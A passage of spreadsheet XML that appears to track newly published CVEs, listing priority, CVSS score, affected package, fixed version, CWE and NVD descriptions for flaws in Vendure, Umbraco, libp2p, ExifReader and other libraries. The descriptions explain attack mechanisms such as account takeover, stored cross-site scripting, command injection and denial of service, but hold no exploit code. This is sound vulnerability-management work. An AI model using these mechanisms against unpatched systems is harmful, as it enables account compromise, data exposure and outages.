          <t>Vendure is an open-source headless commerce platform. Prior to 3.7.0, ExternalAuthenticationService.createCustomerAndUser in packages/core/src/service/helpers/external-authentication/external-authentication.service.ts selects an existing customer user by emailAddress and attaches a newly presented ExternalAuthenticationMethod without requiring verified to be true. In deployments with a custom external AuthenticationStrategy that forwards an email whose ownership the provider has not verified, an attacker can authenticate with a victim's email and bind the attacker's external identity to the victim's existing account. This can expose orders, addresses, and personal information and permit account changes or orders as the victim. Native-only email and password deployments and external strategies that always require provider-verified email ownership are unaffected, and new-account creation for an unused email remains permitted. This issue is fixed in version 3.7.0.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63472</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63459</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/dashboard</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, RichTextDescriptionCell in packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx attempts to strip markup by assigning an administrator-controlled description to a live element's innerHTML and then reading textContent. Active resource markup can execute an event handler during the innerHTML assignment before textContent is read. A lower-privilege administrator can store such markup in descriptions rendered by the Products list, Collections list, Promotions list, Payment Methods list, or Shipping Methods list, and script executes when another administrator views the affected row. This stored cross-site scripting can compromise the viewing administrator's session and enable cross-privilege or cross-channel administrative actions. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63459</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69197</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="inlineStr"/>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>nuget:Umbraco.Cms</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>13.15.1, 17.5.3, 18.0.2</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="S6" s="5" t="inlineStr">
        <is>
          <t>Umbraco is an ASP.NET CMS. Prior to 13.15.1, 17.5.3, and 18.0.2, the Content Delivery API applies member and Public Access checks to the directly requested node but not to referenced nodes serialized through Content Picker or Multi-Node Tree Picker properties, including pickers nested in Block List, Block Grid, or Rich Text Editor blocks. When DeliveryApi:PublicAccess is enabled, an anonymous caller can retrieve a protected node's name, route, and id through an unprotected referencing node and use ?expand to retrieve full property values. When the Delivery API is instead gated by the organization-wide API key, a key holder can still bypass per-node Public Access through the same expansion path. The same RequestContextOutputExpansionStrategyV2 and ElementOnlyOutputExpansionStrategy path also bypasses allowed or disallowed content-type alias restrictions for referenced content. Direct requests for the protected node still return 401, and no integrity or availability impact is established. This issue is fixed in versions 13.15.1, 17.5.3, and 18.0.2.</t>
        </is>
      </c>
      <c r="T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69197</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71538</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>npm:@cyclonedx/cyclonedx-npm</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>6.0.0</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>@cyclonedx/cyclonedx-npm creates CycloneDX Software Bill of Materials from npm projects. Prior to version 6.0.0, the Windows fallback path in src/npmRunner.ts, used when npm_execpath does not provide the npm CLI path, can construct a shell command containing an untrusted value from the --workspace option. When an attacker can influence that option and the fallback npm execution path is reached, shell metacharacters in the workspace value can execute arbitrary operating-system commands with the privileges of the user running the CLI, allowing data access, file modification, or service disruption. This issue is fixed in version 6.0.0.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71538</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86039</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/peer-store</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>12.0.24</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-345</t>
        </is>
      </c>
      <c r="S8" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 8.0.0 until 12.0.24, @libp2p/peer-store in packages/peer-store/src/index.ts uses consumePeerRecord to verify a RecordEnvelope signature but does not require PeerRecord.peerId in the signed payload to equal the signer peer ID derived by RecordEnvelope.openAndCertify. The expectedPeer option checks only the envelope signer, and the gossipsub Peer Exchange path can provide the attacker's own peer ID as expectedPeer. An attacker can therefore sign a record with the attacker's key, place a victim peer ID and attacker-controlled multiaddrs in the payload, and have certified addresses stored for the victim. The poisoned addresses can cause address-book corruption, dial redirection or failure, routing manipulation, and reachability disruption, although the connection upgrade still verifies remote peer identity and prevents a complete identity takeover. The issue is fixed in version 12.0.24.</t>
        </is>
      </c>
      <c r="T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86039</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63460</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>npm:vendure/core</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, the public Shop GraphQL API allows an unauthenticated caller to supply a catastrophically backtracking pattern through StringOperators.regex. packages/core/src/service/helpers/list-query-builder/parse-filter-params.ts passes the raw pattern to the REGEXP implementation registered by packages/core/src/service/helpers/list-query-builder/list-query-builder.ts, and better-sqlite3 and sqljs evaluate it synchronously in the Node.js event loop. ShopProductsResolver.products is publicly reachable, so one nested-quantifier pattern can block request processing and make the storefront and admin API unavailable, while repeated requests can sustain denial of service. PostgreSQL and MySQL or MariaDB deployments do not execute this regular expression in the Node.js event loop. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63460</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68523</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>0.19.0</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S10"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0" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68523</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68537</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>rust:fulgur</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>0.26.0</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>`fulgur` converts untrusted HTML/CSS into PDF, commonly on a server that processes input supplied by many tenants. In versions prior to 0.19.0, a body-direct child whose CSS-resolved height greatly exceeds the page height was sliced into one fragment per page with no upper bound. This is fixed in version 0.19.0. A `MAX_PAGES` cap bounds the slice loop — halting it even for a `+inf` height — and non-finite layout heights are sanitized so they can no longer drive the loop. As a workaround, validate or constrain untrusted CSS (in particular `height` / `vh` on body-level elements) before passing HTML to fulgur.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68537</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81515</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Eureka</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, EurekaDiscoveryClient deserializes the registry response as one unit, and an unrecognized actionType or status, a non-Boolean isCoordinatingDiscoveryServer, or a nonnumeric timestamp can abort the entire response. A principal that can register or update an instance can cause all connected Steeltoe clients to receive an empty or stale instance list until the malformed registration is removed. The JsonInstanceInfoConverter, BoolStringJsonConverter, and LongStringJsonConverter parsing paths are affected. This issue is distinct from the earlier DataCenterInfo.name parsing vulnerability. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81515</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81516</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>nuget:Steeltoe.Discovery.Consul</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>4.3.0</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-755</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Steeltoe is an open source project that provides a collection of libraries that helps users build cloud-native applications. From 4.0.0 until 4.3.0, ConsulDiscoveryClient constructs ConsulServiceInstance objects by parsing each registration's secure metadata with a strict Boolean conversion. A principal that can register a Consul service can supply a secure value other than true or false, causing the exception from one instance to abort construction of the entire instance list and make the targeted service undiscoverable. When GetAllInstancesAsync enumerates all services, one malformed instance can abort enumeration across every service. The outage persists until the offending registration is removed. This issue is fixed in version 4.3.0.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81516</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85715</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>npm:exifreader</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>4.41.1</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-789, CWE-835</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>ExifReader is a JavaScript Exif information parser. Prior to 4.41.1, ExifReader parses attacker-controlled HEIC or AVIF ISO-BMFF files in getItems() within src/image-header-iso-bmff-iloc.js and trusts iloc itemCount and extentCount values while allocating an extent object for every nested-loop iteration. When offsetSize, lengthSize, baseOffsetSize, and indexSize are zero, the extent fields consume no input bytes and the buffer offset does not advance, but the parser can still allocate up to itemCount multiplied by extentCount objects without an allocation budget. A small malicious iloc box can therefore cause hundreds of megabytes of heap growth or exhaust system memory, terminating a Node.js process and denying service to web, desktop, or mobile applications that parse untrusted images. The zero field widths are valid ISO-BMFF values indicating absent fields, so the vulnerable parser must bound work rather than relying on offset advancement. The issue is fixed in version 4.41.1.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85715</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85721</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M15" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, automatic response decompression on the HTTP/1.1 path uses ChannelManager.newHttpContentDecompressor() to install Http1ContentDecompressor without a cumulative output-size limit. A hostile or compromised server, or an attacker who can alter a response in transit, can send a small gzip, deflate, or snappy response that expands across chunks until the client exhausts its heap and raises OutOfMemoryError; brotli and zstd are also affected when their optional codecs are present. In versions 3.0.8 through 3.0.10, the HTTP/2 decompressor is also unbounded, so switching protocols does not mitigate the issue on those releases. A limit applied to each decode call is insufficient because the response can be delivered as many small chunks, so the fixed implementation tracks total decompressed bytes for the whole response. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85721</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86038</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/gossipsub</t>
        </is>
      </c>
      <c r="M16" s="5" t="inlineStr">
        <is>
          <t>16.0.5</t>
        </is>
      </c>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 15.0.0 until 16.0.5, @libp2p/gossipsub uses the default StrictSign policy in packages/gossipsub/src/utils/buildRawMessage.ts, where validateToRawMessage verifies a signature with attacker-controlled msg.key but skips binding that key to msg.from when the claimed author is an RSA peer ID that does not inline a public key. An unauthenticated attacker can place a victim RSA peer ID in msg.from, sign the message with the attacker's private key, and supply the attacker's public key in msg.key, causing the message to be accepted and propagated as authored by the victim. Applications that trust message.from for validators, authorization, accounting, moderation, reputation, or audit logging can process attacker-controlled data under false origin attribution. The issue is fixed in version 16.0.5.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86038</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86049</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr"/>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>pip:jupyter_server</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>2.21.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Jupyter Server is the backend for Jupyter web applications. Prior to version 2.21.0, the 5xx request logging path in jupyter_server/log.py copies the Referer header into a JSON header block without applying the token scrubbing used for the request URI. A request that returns HTTP 500 while the Referer contains a token-bearing URL can therefore write that token to server logs in plaintext. An attacker who can read those logs can recover the token and use the affected user's Jupyter Server permissions. This issue is fixed in version 2.21.0.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
